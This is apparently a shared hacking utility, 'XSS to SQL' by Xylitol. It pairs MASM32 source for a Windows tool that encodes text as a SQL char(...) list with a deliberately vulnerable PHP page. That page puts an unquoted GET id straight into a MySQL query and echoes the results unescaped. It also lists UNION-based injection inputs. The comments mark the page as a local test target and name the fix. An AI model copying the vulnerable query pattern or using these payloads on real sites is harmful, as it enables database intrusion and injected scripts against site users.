Jako

XSS to SQL v0.1 by Xylitol


; ---- skeleton -----------------------------------------------------------
; XSS to SQL v0.1 - MASM32, 32-bit Windows, stdcall, Intel syntax.
; A small dialog that turns a typed string into a comma-separated list of
; decimal byte values wrapped in "char(...)" (see DlgProc) and can copy the
; result to the clipboard (see SetClipboard).
.686
.model flat, stdcall
option casemap :none                    ; symbol names are case sensitive

; ---- Include ------------------------------------------------------------
include         \masm32\include\windows.inc
include         \masm32\include\kernel32.inc
include         \masm32\include\comctl32.inc
include         \masm32\include\user32.inc
include         \masm32\macros\macros.asm   ; chr$ and friends

includelib        \masm32\lib\kernel32.lib
includelib         \masm32\lib\user32.lib
includelib         \masm32\lib\comctl32.lib

; Prototypes: invoke is positional, so only the argument sizes matter here.
DlgProc         PROTO     :DWORD,:DWORD,:DWORD,:DWORD   ; (hWnd,uMsg,wParam,lParam) dialog procedure
AddComma        PROTO     :DWORD,:DWORD                 ; (src,dst) comma-separate 3-character groups
SetClipboard    PROTO     :DWORD                        ; (txt) put an ASCII string on the clipboard

; #########################################################################

.const
; Resource ids; they must match the dialog template (.rc), which is not on this page.
IDD_DIALOG1        equ 100             ; main dialog
IDC_EDT1        equ 101                ; input edit control
IDC_EDT2        equ 102                ; output edit control

.data
; Scratch copy of the output edit text for the clipboard. It is never
; initialised, so it could live in .data? like the buffers below.
szBuffer        db 256 dup(?)

.data?
hInstance         dd ?
szInput         db 512 dup(?)          ; text read from IDC_EDT1 (DlgProc caps it at 50 chars)
szOutput1         db 512 dup(?)        ; 3 decimal digits per input byte, no separators
szOutput2         db 512 dup(?)        ; same groups, comma-separated
szOutputF         db 512 dup(?)        ; "char(" + szOutput2 + ")", shown in IDC_EDT2
szinputLen         dd ?                ; scratch: number of input bytes

.code
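; -------------------------------------------------------------------------
; WinMain - program entry point (plain label, no parameters).
; Registers the common controls, runs the modal dialog and exits with the
; value DialogBoxParam returns (the nResult given to EndDialog).
; Fix vs. the original: InitCommonControls ran only after DialogBoxParam had
; returned, and its (void) result was then passed to ExitProcess, leaving the
; exit code undefined.
; -------------------------------------------------------------------------
WinMain:
    invoke InitCommonControls           ; must precede creation of the dialog
    invoke GetModuleHandle,0
    mov hInstance,eax
    invoke DialogBoxParam,hInstance,IDD_DIALOG1,0,addr DlgProc,0
    invoke ExitProcess,eax              ; eax = EndDialog's nResult (0 here)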

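; -------------------------------------------------------------------------
; INT_PTR CALLBACK DlgProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
; Dialog procedure for IDD_DIALOG1.
;   Button 1090 ("Convert"): reads IDC_EDT1 (at most 50 characters), writes
;       every byte as its 3-digit decimal value, comma-separated and wrapped
;       in "char(...)", into IDC_EDT2, then zeroes all working buffers.
;   Button 1097 ("Copy"):    copies the text of IDC_EDT2 to the clipboard.
;   Button 1098 ("Exit") and WM_CLOSE: end the dialog.
; Returns TRUE for handled messages, FALSE otherwise (WM_INITDIALOG included,
; as in the original).
; The 50-character cap is what keeps the outputs (3 and 4 bytes per input
; byte, plus "char(" and ")") inside the 512-byte buffers - do not raise it
; without resizing them.
; Fixes vs. the original: the loop counter was kept at [ebp-3], a DWORD that
; overlaps the pushed esi and the saved ebp (stack corruption); edi and ebx
; (callee-saved under stdcall) were clobbered; a dead lstrlen(uMsg)/div-by-3
; sequence ran after the loop; the WM_CLOSE test compared eax after the
; WM_COMMAND path had already overwritten it with the control id; the
; literal 102 is now IDC_EDT2.
; Clobbers: eax, ecx, edx (esi/edi saved by USES).
; -------------------------------------------------------------------------
DlgProc proc uses esi edi hWnd:HWND,uMsg:UINT,wParam:WPARAM,lParam:LPARAM
    mov eax,uMsg
    .if eax==WM_COMMAND
        mov eax,wParam
        mov edx,eax
        shr edx,16                      ; edx = notification code
        and eax,0ffffh                  ; eax = control id
        .if edx==BN_CLICKED
            .if eax==1090               ; "Convert"
                invoke GetDlgItemText,hWnd,IDC_EDT1,addr szInput,sizeof szInput
                .if eax > 50
                    invoke SetDlgItemText,hWnd,IDC_EDT2,chr$("Input is too big")
                .elseif eax==0
                    ; empty input: the original jumped to the "Copy" hint here too
                    invoke SetDlgItemText,hWnd,IDC_EDT2,chr$("Click Convert first.")
                .else
                    mov szinputLen,eax          ; loop counter: bytes left to convert
                    mov esi,offset szInput      ; source byte
                    mov edi,offset szOutput1    ; 3 digits per byte, no separator
                    mov ecx,10
                @std:
                    movzx eax,byte ptr [esi]    ; b = *esi (0..255)
                    xor edx,edx
                    div ecx                     ; eax = b/10, edx = b%10 (unsigned; same result as the original idiv)
                    add dl,'0'
                    mov byte ptr [edi+2],dl     ; units
                    xor edx,edx
                    div ecx                     ; eax = b/100, edx = (b/10)%10
                    add dl,'0'
                    mov byte ptr [edi+1],dl     ; tens
                    add al,'0'
                    mov byte ptr [edi],al       ; hundreds
                    add edi,3
                    inc esi
                    dec szinputLen
                    jnz @std
                    invoke AddComma,addr szOutput1,addr szOutput2
                    invoke lstrlen,addr szOutput2
                    mov byte ptr [eax+offset szOutput2-1],0     ; drop the trailing comma
                    invoke lstrcat,addr szOutputF,chr$("char",28h)   ; "char("
                    invoke lstrcat,addr szOutputF,addr szOutput2
                    invoke lstrcat,addr szOutputF,chr$(29h)          ; ")"
                    invoke SetDlgItemText,hWnd,IDC_EDT2,addr szOutputF
                    ; clear the buffers so the next conversion starts from empty strings
                    invoke RtlZeroMemory,addr szInput,sizeof szInput
                    invoke RtlZeroMemory,addr szOutput1,sizeof szOutput1
                    invoke RtlZeroMemory,addr szOutput2,sizeof szOutput2
                    invoke RtlZeroMemory,addr szOutputF,sizeof szOutputF
                .endif
            .elseif eax==1097           ; "Copy"
                invoke GetDlgItemText,hWnd,IDC_EDT2,addr szBuffer,sizeof szBuffer
                .if eax==0
                    invoke SetDlgItemText,hWnd,IDC_EDT2,chr$("Click Convert first.")
                .else
                    invoke SetClipboard,addr szBuffer
                .endif
            .elseif eax==1098           ; "Exit"
                invoke EndDialog,hWnd,0
            .endif
        .endif
    .elseif eax==WM_CLOSE
        invoke EndDialog,hWnd,0
    .else
        xor eax,eax                     ; not handled
        ret
    .endif
    mov eax,TRUE
    ret
DlgProc endp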

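; -------------------------------------------------------------------------
; void AddComma(const char *src, char *dst)
; src: NUL-terminated run of 3-character groups ("065066...").
; dst: receives every group followed by ',', then a NUL - so the result
;      keeps a trailing comma, which the caller strips.
; No length check: dst must hold 4/3 * strlen(src) + 1 bytes (the 50-byte
; input cap in DlgProc guarantees this for the 512-byte buffers).
; Fixes vs. the original: it moved whole DWORDs per 3-byte group, only
; stopped on a DWORD of zeros (so it relied on the source being zero-padded
; behind the terminator) and clobbered ebx/esi/edi without saving them,
; although they are callee-saved under stdcall.
; Clobbers: eax.
; -------------------------------------------------------------------------
AddComma proc uses esi edi src:DWORD,dst:DWORD
    mov esi,src
    mov edi,dst
    jmp short @chk
@grp:
    mov al,byte ptr [esi]               ; copy the 3-digit group ...
    mov byte ptr [edi],al
    mov al,byte ptr [esi+1]
    mov byte ptr [edi+1],al
    mov al,byte ptr [esi+2]
    mov byte ptr [edi+2],al
    mov byte ptr [edi+3],','            ; ... and its separator
    add esi,3
    add edi,4
@chk:
    cmp byte ptr [esi],0                ; digits are never NUL, so this is the end of src
    jne @grp
    mov byte ptr [edi],0                ; terminate (after the trailing comma)
    ret
AddComma endp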

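; -------------------------------------------------------------------------
; BOOL SetClipboard(const char *txt)
; Copies the NUL-terminated ASCII string txt to the clipboard as CF_TEXT.
; On success the clipboard owns the GHND block; on any failure the block is
; freed here and the clipboard is closed if it had been opened.
; Fixes vs. the original: OpenClipboard/GlobalAlloc/GlobalLock results were
; used unchecked (a NULL from GlobalLock became the rep movsb destination),
; a failed SetClipboardData leaked the block, and esi/edi - callee-saved
; under stdcall - were clobbered.
; Returns: eax = 1 on success, 0 on failure (callers currently ignore it).
; Clobbers: eax, ecx, edx.
; -------------------------------------------------------------------------
SetClipboard    proc    uses esi edi txt:DWORD
local    sLen:DWORD                      ; strlen(txt)+1 = bytes to copy
local    hMem:DWORD                      ; block handed to the clipboard

    invoke lstrlen, txt
    inc eax                             ; include the terminator
    mov sLen, eax
    invoke OpenClipboard, 0
    .if eax == 0
        ret                             ; eax = 0: clipboard busy / unavailable
    .endif
    invoke GlobalAlloc, GHND, sLen      ; moveable + zero-filled, as the clipboard requires
    .if eax == 0
        invoke CloseClipboard
        xor eax, eax
        ret
    .endif
    mov hMem, eax
    invoke GlobalLock, eax
    .if eax == 0
        invoke GlobalFree, hMem
        invoke CloseClipboard
        xor eax, eax
        ret
    .endif
    mov edi, eax                        ; dst = locked block
    mov esi, txt                        ; src = caller's text
    mov ecx, sLen
    rep movsb
    invoke GlobalUnlock, hMem
    invoke EmptyClipboard
    invoke SetClipboardData, CF_TEXT, hMem
    .if eax == 0
        invoke GlobalFree, hMem         ; clipboard did not take ownership
        invoke CloseClipboard
        xor eax, eax
        ret
    .endif
    invoke CloseClipboard
    mov eax, 1
    ret
SetClipboard endp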

end WinMain

Local usage example:

<?php
// Intentionally vulnerable local test target that accompanies the converter
// above; it is not meant to be deployed.
// NOTE(review): the mysql_* extension was removed in PHP 7, so this only
// runs on PHP 5.x. Connecting as root with an empty password is part of the
// throw-away setup, not something to copy.
/*
SQL:
CREATE TABLE IF NOT EXISTS `users` (
  `user_id` mediumint(9) NOT NULL AUTO_INCREMENT,
  `username` varchar(50) NOT NULL,
  `nom` varchar(80) NOT NULL,
  `prenom` varchar(80) NOT NULL,
  `email` varchar(80) NOT NULL,
  PRIMARY KEY (`user_id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=7 ;

INSERT INTO `users` (`user_id`, `username`, `nom`, `prenom`, `email`) VALUES
(1, 'Xylitol', 'Ano', 'Nymous', 'not disclosed'),
(2, 'Krach', 'Ano', 'Nymous', 'not disclosed'),
(3, 'Tishrom', 'Ano', 'Nymous', 'not disclosed'),
(4, 'Karkinge', 'Ano', 'Nymous', 'not disclosed'),
(5, 'H00b3n', 'Ano', 'Nymous', 'not disclosed'),
(6, 'Spawn', 'Ano', 'Nymous', 'not disclosed');

Usage:
vuln.php?id=4 order by 4
vuln.php?id=-1+union+select+1,2,3,4,5--

*/
mysql_connect("localhost","root","");
mysql_select_db("testsqlinj");
// $_GET['id'] goes into the query unvalidated and unquoted: this is the SQL
// injection the page demonstrates. The commented-out intval() is the minimal
// fix for a numeric id; the general fix is a prepared statement with a bound
// parameter (mysqli or PDO).
$user_id = $_GET['id']; // $user_id = intval($_GET['id']);
$sql = mysql_query("SELECT username, nom, prenom, email FROM users WHERE user_id = $user_id") or die(mysql_error());
if(mysql_num_rows($sql) > 0)
{
$data = mysql_fetch_object($sql);
// The column values are echoed into HTML without htmlspecialchars(), so any
// markup stored in the table (or returned by an injected query) is rendered
// as-is - the XSS half of the title.
echo "
<fieldset>
<legend>Profile de ".$data->username."</legend>
<p>Nom d'utilisateur : ".$data->username."</p>
<p>Nom et prénom : ".$data->nom." " .$data->prenom ."</p>
<p>Adresse email : ".$data->email."</p>
</fieldset>";
}
?>

 
